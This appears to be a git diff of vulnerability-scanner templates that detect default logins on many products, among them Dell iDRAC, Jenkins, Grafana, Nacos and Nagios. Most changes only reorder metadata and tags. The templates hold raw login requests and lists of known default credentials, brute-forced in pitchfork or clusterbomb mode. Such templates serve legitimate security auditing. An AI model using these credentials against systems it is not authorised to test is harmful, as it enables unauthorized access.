@@ http: headers: Content-Type: "application/x-www-form-urlencode" Referer: "{{BaseURL}}/login.html" - cookie-reuse: true + matchers-condition: and matchers: - type: status diff --git a/http/default-logins/dell/dell-idrac9-default-login.yaml b/http/default-logins/dell/dell-idrac9-default-login.yaml index 7abc55a72d..5d815032b8 100644 --- a/http/default-logins/dell/dell-idrac9-default-login.yaml +++ b/http/default-logins/dell/dell-idrac9-default-login.yaml @@ -9,9 +9,9 @@ info: - https://www.dell.com/support/kbdoc/en-us/000177787/how-to-change-the-default-login-password-of-the-idrac-9 classification: cwe-id: cwe-798 - tags: dell,idrac,default-login metadata: max-request: 1 + tags: dell,idrac,default-login http: - raw: diff --git a/http/default-logins/dell/emcecom-default-login.yaml b/http/default-logins/dell/emcecom-default-login.yaml index f838209fe8..5c340a5c28 100644 --- a/http/default-logins/dell/emcecom-default-login.yaml +++ b/http/default-logins/dell/emcecom-default-login.yaml @@ -5,15 +5,14 @@ info: author: Techryptic (@Tech) severity: high description: Dell EMC ECOM default login information "(admin:#1Password)" was discovered. + remediation: To resolve this issue, perform a "remsys" and "addsys" with no other operations occurring (reference the appropriate SMI-S provider documentation) and specify the new password when re-adding the array. If there are issues performing the "addsys" operation, it is recommended to restart the management server on each SP. reference: - https://www.dell.com/support/kbdoc/en-za/000171270/vipr-controller-operation-denied-by-clariion-array-you-are-not-privileged-to-perform-the-requested-operation classification: cwe-id: CWE-798 - remediation: To resolve this issue, perform a "remsys" and "addsys" with no other operations occurring (reference the appropriate SMI-S provider documentation) and specify the new password when re-adding the array. - If there are issues performing the "addsys" operation, it is recommended to restart the management server on each SP. - tags: dell,emc,ecom,default-login metadata: max-request: 1 + tags: dell,emc,ecom,default-login http: - raw: diff --git a/http/default-logins/digitalrebar/digitalrebar-default-login.yaml b/http/default-logins/digitalrebar/digitalrebar-default-login.yaml index a881a10b06..8bbd2572f8 100644 --- a/http/default-logins/digitalrebar/digitalrebar-default-login.yaml +++ b/http/default-logins/digitalrebar/digitalrebar-default-login.yaml @@ -12,9 +12,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L cvss-score: 8.3 cwe-id: CWE-522 - tags: rackn,digitalrebar,default-login metadata: max-request: 1 + tags: rackn,digitalrebar,default-login http: - raw: @@ -28,8 +28,8 @@ http: - rocketskates password: - r0cketsk8ts - attack: pitchfork + matchers-condition: and matchers: - type: status diff --git a/http/default-logins/druid/druid-default-login.yaml b/http/default-logins/druid/druid-default-login.yaml index 3fae27a8b9..d88f89526c 100644 --- a/http/default-logins/druid/druid-default-login.yaml +++ b/http/default-logins/druid/druid-default-login.yaml @@ -7,9 +7,9 @@ info: description: Apache Druid default login information (admin/admin) was discovered. classification: cwe-id: CWE-798 - tags: druid,default-login metadata: max-request: 2 + tags: druid,default-login http: - raw: @@ -18,7 +18,6 @@ http: Host: {{Hostname}} loginUsername={{username}}&loginPassword={{password}} - - | POST /submitLogin HTTP/1.1 Host: {{Hostname}} @@ -34,7 +33,6 @@ http: matchers-condition: and matchers: - - type: status status: - 200 diff --git a/http/default-logins/dvwa/dvwa-default-login.yaml b/http/default-logins/dvwa/dvwa-default-login.yaml index e1fac4977b..897ae7e691 100644 --- a/http/default-logins/dvwa/dvwa-default-login.yaml +++ b/http/default-logins/dvwa/dvwa-default-login.yaml @@ -9,9 +9,9 @@ info: - https://opensourcelibs.com/lib/dvwa classification: cwe-id: CWE-798 - tags: dvwa,default-login metadata: max-request: 2 + tags: dvwa,default-login http: - raw: @@ -20,7 +20,6 @@ http: Host: {{Hostname}} Accept-Language: en-GB,en-US;q=0.9,en;q=0.8 Connection: close - - | POST /login.php HTTP/1.1 Host: {{Hostname}} @@ -52,7 +51,6 @@ http: part: body kval: - PHPSESSID - host-redirects: true matchers: - type: word diff --git a/http/default-logins/easyreport/easyreport-default-login.yaml b/http/default-logins/easyreport/easyreport-default-login.yaml index 5e7f587cfb..1b03de3a6d 100644 --- a/http/default-logins/easyreport/easyreport-default-login.yaml +++ b/http/default-logins/easyreport/easyreport-default-login.yaml @@ -7,8 +7,8 @@ info: classification: cwe-id: CWE-798 metadata: - max-request: 1 verified: true + max-request: 1 fofa-query: body="EasyReport-A Sample and Easy to Use Web Reporting System" tags: easyreport,default-login diff --git a/http/default-logins/elasticsearch/elasticsearch-default-login.yaml b/http/default-logins/elasticsearch/elasticsearch-default-login.yaml index 2fe279313e..496f0efa40 100644 --- a/http/default-logins/elasticsearch/elasticsearch-default-login.yaml +++ b/http/default-logins/elasticsearch/elasticsearch-default-login.yaml @@ -10,12 +10,11 @@ info: - https://www.alibabacloud.com/blog/what-is-the-default-username-and-password-for-elasticsearch_599610 - https://www.elastic.co/guide/en/elasticsearch/reference/current/built-in-users.html metadata: + verified: true max-request: 1 shodan-query: http.title:"Elastic" || http.favicon.hash:1328449667 - verified: true tags: default-login,elasticsearch - http: - raw: - | diff --git a/http/default-logins/empire/empirec2-default-login.yaml b/http/default-logins/empire/empirec2-default-login.yaml index 95e829e685..fac5c6b5db 100644 --- a/http/default-logins/empire/empirec2-default-login.yaml +++ b/http/default-logins/empire/empirec2-default-login.yaml @@ -10,9 +10,9 @@ info: - https://github.com/BC-SECURITY/Empire - https://github.com/BC-SECURITY/empire-docs/blob/main/restful-api/README.md metadata: - max-request: 2 verified: true - tags: default-login,empire,c2 + max-request: 2 + tags: default-login,empire,c2,intrusive http: - raw: @@ -31,7 +31,6 @@ http: {{password}} ------WebKitFormBoundaryoZwyedGcQU4FrcFV-- - - | POST /api/admin/login HTTP/1.1 Host: {{Hostname}} @@ -45,8 +44,8 @@ http: - empireadmin password: - password123 - stop-at-first-match: true + matchers-condition: and matchers: - type: word @@ -63,4 +62,4 @@ http: - type: status status: - - 200 \ No newline at end of file + - 200 diff --git a/http/default-logins/emqx/emqx-default-login.yaml b/http/default-logins/emqx/emqx-default-login.yaml index ae45352985..6c55abd19c 100644 --- a/http/default-logins/emqx/emqx-default-login.yaml +++ b/http/default-logins/emqx/emqx-default-login.yaml @@ -29,7 +29,6 @@ http: - admin pass: - public - matchers: - type: dsl dsl: diff --git a/http/default-logins/esafenet-cdg-default-login.yaml b/http/default-logins/esafenet-cdg-default-login.yaml index 6fde20f03e..192def9b52 100644 --- a/http/default-logins/esafenet-cdg-default-login.yaml +++ b/http/default-logins/esafenet-cdg-default-login.yaml @@ -7,19 +7,20 @@ info: description: | Esafenet electronic document security management system default credentials were discovered. metadata: - fofa-query: esafenet - max-request: 32 verified: true + max-request: 32 + fofa-query: esafenet tags: esafenet,cdg,default-login http: - method: POST path: - "{{BaseURL}}/CDGServer3/SystemConfig" + headers: content-type: application/x-www-form-urlencoded - body: "command=Login&help=null&verifyCodeDigit=dfd&name={{username}}&pass={{password}}" + body: "command=Login&help=null&verifyCodeDigit=dfd&name={{username}}&pass={{password}}" attack: clusterbomb payloads: username: diff --git a/http/default-logins/exacqvision/exacqvision-default-login.yaml b/http/default-logins/exacqvision/exacqvision-default-login.yaml index 79838366ac..48938ccd6e 100644 --- a/http/default-logins/exacqvision/exacqvision-default-login.yaml +++ b/http/default-logins/exacqvision/exacqvision-default-login.yaml @@ -9,9 +9,9 @@ info: - https://cdn.exacq.com/auto/manspec/files_2/exacqvision_user_manuals/web_service/exacqVision_Web_Service_Configuration_User_Manual_(version%208.8).pdf classification: cwe-id: cwe-798 - tags: exacqvision,default-login metadata: max-request: 1 + tags: exacqvision,default-login http: - raw: diff --git a/http/default-logins/feiyuxing/feiyuxing-default-login.yaml b/http/default-logins/feiyuxing/feiyuxing-default-login.yaml index 7707caf3ef..9c55247807 100644 --- a/http/default-logins/feiyuxing/feiyuxing-default-login.yaml +++ b/http/default-logins/feiyuxing/feiyuxing-default-login.yaml @@ -9,8 +9,8 @@ info: reference: - https://github.com/wushigudan/poc/blob/main/%E9%A3%9E%E9%B1%BC%E6%98%9F%E9%BB%98%E8%AE%A4%E5%AF%86%E7%A0%81.py metadata: - max-request: 1 verified: true + max-request: 1 fofa-query: title="飞鱼星企业级智能上网行为管理系统" tags: feiyuxing,default-login,iot diff --git a/http/default-logins/flir/flir-default-login.yaml b/http/default-logins/flir/flir-default-login.yaml index 3bb61583d0..e5c38bbe12 100644 --- a/http/default-logins/flir/flir-default-login.yaml +++ b/http/default-logins/flir/flir-default-login.yaml @@ -9,9 +9,9 @@ info: - https://securitycamcenter.com/flir-default-password/ classification: cwe-id: CWE-798 - tags: default-login,flir,camera,iot metadata: max-request: 1 + tags: default-login,flir,camera,iot http: - raw: @@ -32,7 +32,6 @@ http: matchers-condition: and matchers: - - type: word words: - '"success"' @@ -42,7 +41,6 @@ http: - contains(tolower(header), 'text/html') - contains(tolower(header), 'phpsessid') - contains(tolower(header), 'showcameraid') - condition: and - type: status diff --git a/http/default-logins/frps/frp-default-login.yaml b/http/default-logins/frps/frp-default-login.yaml index e60df806eb..d677a08efc 100644 --- a/http/default-logins/frps/frp-default-login.yaml +++ b/http/default-logins/frps/frp-default-login.yaml @@ -9,9 +9,9 @@ info: - https://github.com/fatedier/frp/issues/1840 classification: cwe-id: CWE-798 - tags: frp,default-login metadata: max-request: 1 + tags: frp,default-login http: - raw: @@ -29,7 +29,6 @@ http: matchers-condition: and matchers: - - type: word words: - '"proxies":' diff --git a/http/default-logins/fuelcms/fuelcms-default-login.yaml b/http/default-logins/fuelcms/fuelcms-default-login.yaml index 0acb19d2b2..bd504d3c92 100644 --- a/http/default-logins/fuelcms/fuelcms-default-login.yaml +++ b/http/default-logins/fuelcms/fuelcms-default-login.yaml @@ -11,16 +11,15 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L cvss-score: 8.3 cwe-id: CWE-522 - tags: fuelcms,default-login,oss metadata: max-request: 2 + tags: fuelcms,default-login,oss http: - raw: - | GET /fuel/login HTTP/1.1 Host: {{Hostname}} - - | POST /fuel/login HTTP/1.1 Host: {{Hostname}} @@ -34,8 +33,8 @@ http: - admin password: - admin - cookie-reuse: true + matchers-condition: and matchers: - type: word diff --git a/http/default-logins/geoserver/geoserver-default-login.yaml b/http/default-logins/geoserver/geoserver-default-login.yaml index 480db6f6b6..071b11ed28 100644 --- a/http/default-logins/geoserver/geoserver-default-login.yaml +++ b/http/default-logins/geoserver/geoserver-default-login.yaml @@ -12,9 +12,9 @@ info: cvss-score: 8.3 cwe-id: CWE-522 metadata: - fofa-query: app="GeoServer" - max-request: 2 verified: true + max-request: 2 + fofa-query: app="GeoServer" tags: geoserver,default-login http: @@ -25,7 +25,6 @@ http: Content-Type: application/x-www-form-urlencoded username={{user}}&password={{pass}} - - | GET /geoserver/web/ HTTP/1.1 Host: {{Hostname}} @@ -36,7 +35,6 @@ http: - admin pass: - geoserver - host-redirects: true max-redirects: 2 cookie-reuse: true diff --git a/http/default-logins/gitlab/gitlab-weak-login.yaml b/http/default-logins/gitlab/gitlab-weak-login.yaml index 210af9fd98..8e02fd2cfd 100644 --- a/http/default-logins/gitlab/gitlab-weak-login.yaml +++ b/http/default-logins/gitlab/gitlab-weak-login.yaml @@ -32,7 +32,6 @@ http: - "root" - "admin" - "admin@local.host" - password: - "5iveL!fe" - "123456789" diff --git a/http/default-logins/glpi/glpi-default-login.yaml b/http/default-logins/glpi/glpi-default-login.yaml index 456da95be7..0522b04480 100644 --- a/http/default-logins/glpi/glpi-default-login.yaml +++ b/http/default-logins/glpi/glpi-default-login.yaml @@ -9,16 +9,15 @@ info: - https://glpi-project.org/ classification: cwe-id: CWE-798 - tags: glpi,default-login metadata: max-request: 2 + tags: glpi,default-login http: - raw: - | GET / HTTP/1.1 Host: {{Hostname}} - - | POST /front/login.php HTTP/1.1 Host: {{Hostname}} @@ -59,8 +58,8 @@ http: group: 1 regex: - "type=\"password\" name=\"([0-9a-z]+)\" id=\"login_password\" required=\"required\"" - cookie-reuse: true + matchers-condition: and matchers: - type: word diff --git a/http/default-logins/google/google-earth-dlogin.yaml b/http/default-logins/google/google-earth-dlogin.yaml index 8cf58c3104..e70d9fc8f1 100644 --- a/http/default-logins/google/google-earth-dlogin.yaml +++ b/http/default-logins/google/google-earth-dlogin.yaml @@ -6,6 +6,11 @@ info: severity: high description: | Google Earth Enterprise default login credentials were discovered. + remediation: | + To reset the username and password: + + sudo /opt/google/gehttpd/bin/htpasswd -c + /opt/google/gehttpd/conf.d/.htpasswd geapacheuse" reference: - https://johnjhacking.com/blog/gee-exploitation/ - https://www.opengee.org/geedocs/5.2.2/answer/3470759.html @@ -13,11 +18,6 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L cvss-score: 8.3 cwe-id: CWE-522 - remediation: | - To reset the username and password: - - sudo /opt/google/gehttpd/bin/htpasswd -c - /opt/google/gehttpd/conf.d/.htpasswd geapacheuse" metadata: max-request: 1 shodan-query: title:"GEE Server" @@ -34,7 +34,6 @@ http: payloads: username: - geapacheuser - password: - geeadmin diff --git a/http/default-logins/gophish/gophish-default-login.yaml b/http/default-logins/gophish/gophish-default-login.yaml index 625edf87ca..edc9d87318 100644 --- a/http/default-logins/gophish/gophish-default-login.yaml +++ b/http/default-logins/gophish/gophish-default-login.yaml @@ -11,16 +11,15 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L cvss-score: 8.3 cwe-id: CWE-522 - tags: gophish,default-login metadata: max-request: 2 + tags: gophish,default-login http: - raw: - | GET /login HTTP/1.1 Host: {{Hostname}} - - | POST /login HTTP/1.1 Host: {{Hostname}} @@ -34,8 +33,8 @@ http: - admin pass: - gophish - cookie-reuse: true + extractors: - type: regex name: csrf_token @@ -44,7 +43,6 @@ http: group: 1 regex: - 'name="csrf_token" value="(.+?)"' - matchers: - type: dsl dsl: diff --git a/http/default-logins/grafana/grafana-default-login.yaml b/http/default-logins/grafana/grafana-default-login.yaml index 09496909cf..c65aebd49c 100644 --- a/http/default-logins/grafana/grafana-default-login.yaml +++ b/http/default-logins/grafana/grafana-default-login.yaml @@ -43,13 +43,13 @@ http: matchers: - type: word words: - - "grafana_session" # Login cookie + - "grafana_session" # Login cookie part: header - type: word part: body words: - - "Logged in" # Logged in keyword + - "Logged in" # Logged in keyword - type: status status: diff --git a/http/default-logins/guacamole/guacamole-default-login.yaml b/http/default-logins/guacamole/guacamole-default-login.yaml index c67cf62f97..9aaa377d68 100644 --- a/http/default-logins/guacamole/guacamole-default-login.yaml +++ b/http/default-logins/guacamole/guacamole-default-login.yaml @@ -11,9 +11,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L cvss-score: 8.3 cwe-id: CWE-522 - tags: guacamole,default-login metadata: max-request: 1 + tags: guacamole,default-login http: - raw: diff --git a/http/default-logins/hongdian/hongdian-default-login.yaml b/http/default-logins/hongdian/hongdian-default-login.yaml index cb8c7dc0b2..6ba6d80e35 100644 --- a/http/default-logins/hongdian/hongdian-default-login.yaml +++ b/http/default-logins/hongdian/hongdian-default-login.yaml @@ -11,9 +11,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L cvss-score: 8.3 cwe-id: CWE-522 - tags: hongdian,default-login metadata: max-request: 4 + tags: hongdian,default-login http: - raw: @@ -23,7 +23,6 @@ http: Authorization: Basic {{base64(username + ':' + password)}} Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzip, deflate - - | GET / HTTP/1.1 Host: {{Hostname}} diff --git a/http/default-logins/hp/hp-switch-default-login.yaml b/http/default-logins/hp/hp-switch-default-login.yaml index 13a844ac40..77e3b7fb1e 100644 --- a/http/default-logins/hp/hp-switch-default-login.yaml +++ b/http/default-logins/hp/hp-switch-default-login.yaml @@ -19,10 +19,10 @@ info: http: - raw: - | - POST /htdocs/login/login.lua HTTP/1.1 - Host: {{Hostname}} + POST /htdocs/login/login.lua HTTP/1.1 + Host: {{Hostname}} - username={{username}}&password= + username={{username}}&password= payloads: username: diff --git a/http/default-logins/hybris/hybris-default-login.yaml b/http/default-logins/hybris/hybris-default-login.yaml index 3c8430133d..071872dd14 100644 --- a/http/default-logins/hybris/hybris-default-login.yaml +++ b/http/default-logins/hybris/hybris-default-login.yaml @@ -10,8 +10,8 @@ info: cvss-score: 8.3 cwe-id: CWE-522 metadata: - max-request: 3 verified: true + max-request: 3 shodan-query: title:"Hybris" tags: default-login,hybris @@ -20,7 +20,6 @@ http: - | GET /login HTTP/1.1 Host: {{Hostname}} - - | POST /j_spring_security_check HTTP/1.1 Host: {{Hostname}} @@ -29,7 +28,6 @@ http: Referer: {{BaseURL}}login j_username={{username}}&j_password={{password}}&_csrf={{csrftoken}} - - | GET / HTTP/1.1 Host: {{Hostname}} @@ -40,8 +38,8 @@ http: - admin password: - nimda - cookie-reuse: true + matchers-condition: and matchers: - type: word diff --git a/http/default-logins/ibm/ibm-mqseries-default-login.yaml b/http/default-logins/ibm/ibm-mqseries-default-login.yaml index 494771ba75..9495d25b22 100644 --- a/http/default-logins/ibm/ibm-mqseries-default-login.yaml +++ b/http/default-logins/ibm/ibm-mqseries-default-login.yaml @@ -12,9 +12,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L cvss-score: 8.3 cwe-id: CWE-522 - tags: ibm,default-login metadata: max-request: 3 + tags: ibm,default-login http: - raw: diff --git a/http/default-logins/ibm/ibm-storage-default-credential.yaml b/http/default-logins/ibm/ibm-storage-default-credential.yaml index fcfd99c472..a1d3b4a834 100644 --- a/http/default-logins/ibm/ibm-storage-default-credential.yaml +++ b/http/default-logins/ibm/ibm-storage-default-credential.yaml @@ -11,9 +11,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L cvss-score: 8.3 cwe-id: CWE-522 - tags: default-login,ibm,storage metadata: max-request: 1 + tags: default-login,ibm,storage http: - raw: @@ -39,13 +39,13 @@ http: - "/0/Console" - "Property of IBM" condition: and - part: body + - type: word words: - "JSESSIONID" - part: header + - type: status status: - 200 diff --git a/http/default-logins/idemia/idemia-biometrics-default-login.yaml b/http/default-logins/idemia/idemia-biometrics-default-login.yaml index 31415dfba3..87dfd83de1 100644 --- a/http/default-logins/idemia/idemia-biometrics-default-login.yaml +++ b/http/default-logins/idemia/idemia-biometrics-default-login.yaml @@ -11,9 +11,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N cvss-score: 5.8 cwe-id: CWE-522 - tags: idemia,biometrics,default-login metadata: max-request: 1 + tags: idemia,biometrics,default-login http: - raw: diff --git a/http/default-logins/iptime/iptime-default-login.yaml b/http/default-logins/iptime/iptime-default-login.yaml index ca64536b11..a1119eda19 100644 --- a/http/default-logins/iptime/iptime-default-login.yaml +++ b/http/default-logins/iptime/iptime-default-login.yaml @@ -11,9 +11,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L cvss-score: 8.3 cwe-id: CWE-522 - tags: iptime,default-login metadata: max-request: 1 + tags: iptime,default-login http: - raw: diff --git a/http/default-logins/jboss/jboss-jbpm-default-login.yaml b/http/default-logins/jboss/jboss-jbpm-default-login.yaml index d74b838e17..89180867ca 100644 --- a/http/default-logins/jboss/jboss-jbpm-default-login.yaml +++ b/http/default-logins/jboss/jboss-jbpm-default-login.yaml @@ -12,8 +12,8 @@ info: cvss-score: 8.3 cwe-id: CWE-522 metadata: - max-request: 12 verified: true + max-request: 12 shodan-query: html:"JBossWS" tags: jboss,jbpm,default-login @@ -22,14 +22,12 @@ http: - | GET /jbpm-console/app/tasks.jsf HTTP/1.1 Host: {{Hostname}} - - | POST /jbpm-console/app/j_security_check HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded j_username={{user}}&j_password={{pass}} - - | GET /jbpm-console/app/tasks.jsf HTTP/1.1 Host: {{Hostname}} @@ -46,9 +44,9 @@ http: - user - shipper - admin - stop-at-first-match: true cookie-reuse: true + matchers-condition: and matchers: - type: word diff --git a/http/default-logins/jboss/jmx-default-login.yaml b/http/default-logins/jboss/jmx-default-login.yaml index dd4232ee69..e6af138e65 100644 --- a/http/default-logins/jboss/jmx-default-login.yaml +++ b/http/default-logins/jboss/jmx-default-login.yaml @@ -11,16 +11,15 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L cvss-score: 8.3 cwe-id: CWE-522 - tags: jboss,jmx,default-login metadata: max-request: 28 + tags: jboss,jmx,default-login http: - raw: - | GET /jmx-console/ HTTP/1.1 Host: {{Hostname}} - - | GET /jmx-console/ HTTP/1.1 Host: {{Hostname}} @@ -39,8 +38,8 @@ http: - 123456789 - 123qwe - root - req-condition: true + matchers-condition: and matchers: - type: dsl diff --git a/http/default-logins/jenkins/jenkins-default.yaml b/http/default-logins/jenkins/jenkins-default.yaml index 2348c70e18..5d951d91a3 100644 --- a/http/default-logins/jenkins/jenkins-default.yaml +++ b/http/default-logins/jenkins/jenkins-default.yaml @@ -9,23 +9,21 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L cvss-score: 8.3 cwe-id: CWE-522 - tags: jenkins,default-login metadata: max-request: 3 + tags: jenkins,default-login http: - raw: - | GET / HTTP/1.1 Host: {{Hostname}} - - | POST /j_spring_security_check HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded j_username=admin&j_password=admin&from=%2F&Submit=Sign+in - - | GET / HTTP/1.1 Host: {{Hostname}} diff --git a/http/default-logins/jinher/jinher-oa-default-login.yaml b/http/default-logins/jinher/jinher-oa-default-login.yaml index 7c42699c3a..45db6f6540 100644 --- a/http/default-logins/jinher/jinher-oa-default-login.yaml +++ b/http/default-logins/jinher/jinher-oa-default-login.yaml @@ -11,9 +11,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L cvss-score: 8.3 cwe-id: CWE-522 - tags: jinher,default-login metadata: max-request: 1 + tags: jinher,default-login http: - raw: @@ -36,8 +36,8 @@ http: - type: word part: body words: - - "\xcf\xb5\xcd\xb3\xb9\xdc\xc0\xed\xd4\xb1\x7c" - - "\xc4\xfa\xba\xc3\x7c\x7c\x7c" + - "ϵͳ¹ÜÀíÔ±|" + - "ÄúºÃ|||" condition: and - type: word diff --git a/http/default-logins/kanboard-default-login.yaml b/http/default-logins/kanboard-default-login.yaml index d6b579ad95..8beb3969b0 100644 --- a/http/default-logins/kanboard-default-login.yaml +++ b/http/default-logins/kanboard-default-login.yaml @@ -14,8 +14,8 @@ info: cvss-score: 8.3 cwe-id: CWE-522 metadata: - max-request: 2 verified: true + max-request: 2 fofa-query: app="Kanboard" tags: default-login,kanboard @@ -24,7 +24,6 @@ http: - | GET /?controller=AuthController&action=login HTTP/1.1 Host: {{Hostname}} - - | POST /?controller=AuthController&action=check HTTP/1.1 Host: {{Hostname}} @@ -48,7 +47,6 @@ http: regex: - "hidden\" name=\"csrf_token\" value=\"([0-9a-z]+)\"" internal: true - matchers: - type: dsl dsl: diff --git a/http/default-logins/kettle/kettle-default-login.yaml b/http/default-logins/kettle/kettle-default-login.yaml index 569d128eb6..4cfaea2ebb 100644 --- a/http/default-logins/kettle/kettle-default-login.yaml +++ b/http/default-logins/kettle/kettle-default-login.yaml @@ -10,8 +10,8 @@ info: cvss-score: 5.8 cwe-id: CWE-522 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: basic realm="Kettle" tags: default-login,kettle diff --git a/http/default-logins/leostream/leostream-default-login.yaml b/http/default-logins/leostream/leostream-default-login.yaml index 8901ed07c3..1affa67f22 100644 --- a/http/default-logins/leostream/leostream-default-login.yaml +++ b/http/default-logins/leostream/leostream-default-login.yaml @@ -11,9 +11,9 @@ info: cvss-score: 8.3 cwe-id: CWE-522 metadata: - shodan-query: http.title:"Leostream" - max-request: 1 verified: true + max-request: 1 + shodan-query: http.title:"Leostream" tags: leostream,default-login http: diff --git a/http/default-logins/lutron/lutron-default-login.yaml b/http/default-logins/lutron/lutron-default-login.yaml index 6c8eda4b0c..a3be826377 100644 --- a/http/default-logins/lutron/lutron-default-login.yaml +++ b/http/default-logins/lutron/lutron-default-login.yaml @@ -12,9 +12,9 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cwe-id: CWE-1391 - tags: default-login,lutron,iot metadata: max-request: 1 + tags: default-login,lutron,iot http: - method: GET diff --git a/http/default-logins/magnolia-default-login.yaml b/http/default-logins/magnolia-default-login.yaml index 7243dd27ae..3f30841036 100644 --- a/http/default-logins/magnolia-default-login.yaml +++ b/http/default-logins/magnolia-default-login.yaml @@ -12,18 +12,16 @@ info: cvss-score: 7.5 cwe-id: CWE-200 metadata: - max-request: 3 verified: true + max-request: 3 shodan-query: html:"Magnolia is a registered trademark" tags: magnolia,default-login http: - raw: - - | GET /.magnolia/admincentral HTTP/1.1 Host: {{Hostname}} - - | POST /.magnolia/admincentral HTTP/1.1 Host: {{Hostname}} @@ -33,7 +31,6 @@ http: Referer: {{BaseURL}}/.magnolia/admincentral mgnlUserId={{username}}&mgnlUserPSWD={{password}}&csrf={{csrf}} - - | GET /.magnolia/admincentral/PUSH?v-uiId=1 HTTP/1.1 Host: {{Hostname}} diff --git a/http/default-logins/minio/minio-default-login.yaml b/http/default-logins/minio/minio-default-login.yaml index ce9fc45978..5ad4338ca7 100644 --- a/http/default-logins/minio/minio-default-login.yaml +++ b/http/default-logins/minio/minio-default-login.yaml @@ -12,9 +12,9 @@ info: cvss-score: 8.3 cwe-id: CWE-522 metadata: + verified: true max-request: 2 shodan-query: http.html:"symfony Profiler" - verified: true tags: default-login,minio http: @@ -25,7 +25,6 @@ http: Content-Type: application/json {"id":1,"jsonrpc":"2.0","params":{"username":"{{username}}","password":"{{password}}"},"method":"Web.Login"} - - | POST /minio/webrpc HTTP/1.1 Host: {{Hostname}} @@ -42,7 +41,6 @@ http: matchers-condition: and matchers: - - type: word words: - "Content-Type: application/json" @@ -57,4 +55,4 @@ http: - type: status status: - - 200 \ No newline at end of file + - 200 diff --git a/http/default-logins/mobotix/mobotix-default-login.yaml b/http/default-logins/mobotix/mobotix-default-login.yaml index fa8501c758..7374cf0908 100644 --- a/http/default-logins/mobotix/mobotix-default-login.yaml +++ b/http/default-logins/mobotix/mobotix-default-login.yaml @@ -19,7 +19,6 @@ http: - | GET /control/userimage.html HTTP/1.1 Host: {{Hostname}} - - | GET /control/userimage.html HTTP/1.1 Host: {{Hostname}} diff --git a/http/default-logins/mofi/mofi4500-default-login.yaml b/http/default-logins/mofi/mofi4500-default-login.yaml index 7f4a21674c..94f498182e 100644 --- a/http/default-logins/mofi/mofi4500-default-login.yaml +++ b/http/default-logins/mofi/mofi4500-default-login.yaml @@ -11,9 +11,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L cvss-score: 8.3 cwe-id: CWE-522 - tags: mofi,default-login metadata: max-request: 1 + tags: mofi,default-login http: - raw: diff --git a/http/default-logins/nacos/nacos-default-login.yaml b/http/default-logins/nacos/nacos-default-login.yaml index 9989c2f082..c11ff23dec 100644 --- a/http/default-logins/nacos/nacos-default-login.yaml +++ b/http/default-logins/nacos/nacos-default-login.yaml @@ -7,9 +7,9 @@ info: description: | The default username and password for Nacos are both nacos. metadata: - fofa-query: title=="Nacos" - max-request: 2 verified: true + max-request: 2 + fofa-query: title=="Nacos" tags: nacos,default-login,alibaba http: @@ -21,7 +21,6 @@ http: Content-Type: application/x-www-form-urlencoded username={{username}}&password={{password}} - - | POST /nacos/v1/auth/users/login HTTP/1.1 Host: {{Hostname}} @@ -36,8 +35,8 @@ http: - nacos password: - nacos - stop-at-first-match: true + matchers-condition: and matchers: - type: word diff --git a/http/default-logins/nagios/nagios-default-login.yaml b/http/default-logins/nagios/nagios-default-login.yaml index 75cb834fb0..ee89a5c232 100644 --- a/http/default-logins/nagios/nagios-default-login.yaml +++ b/http/default-logins/nagios/nagios-default-login.yaml @@ -11,9 +11,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L cvss-score: 8.3 cwe-id: CWE-522 - tags: nagios,default-login metadata: max-request: 2 + tags: nagios,default-login http: - raw: diff --git a/http/default-logins/nagios/nagiosxi-default-login.yaml b/http/default-logins/nagios/nagiosxi-default-login.yaml index 3f46cbe8d6..21b3f07547 100644 --- a/http/default-logins/nagios/nagiosxi-default-login.yaml +++ b/http/default-logins/nagios/nagiosxi-default-login.yaml @@ -12,8 +12,8 @@ info: cvss-score: 9.8 cwe-id: CWE-1391 metadata: - max-request: 6 verified: true + max-request: 6 shodan-query: title:"Nagios XI" tags: nagios,nagiosxi,default-login @@ -22,14 +22,12 @@ http: - | GET /nagiosxi/login.php HTTP/1.1 Host: {{Hostname}} - - | POST /nagiosxi/login.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded nsp={{nsp}}&page=auth&debug=&pageopt=login&username={{username}}&password={{password}}&loginButton= - - | GET /nagiosxi/index.php HTTP/1.1 Host: {{Hostname}} @@ -42,11 +40,11 @@ http: - nagiosadmin - nagiosxi attack: pitchfork - stop-at-first-match: true host-redirects: true max-redirects: 2 cookie-reuse: true + matchers-condition: and matchers: - type: word diff --git 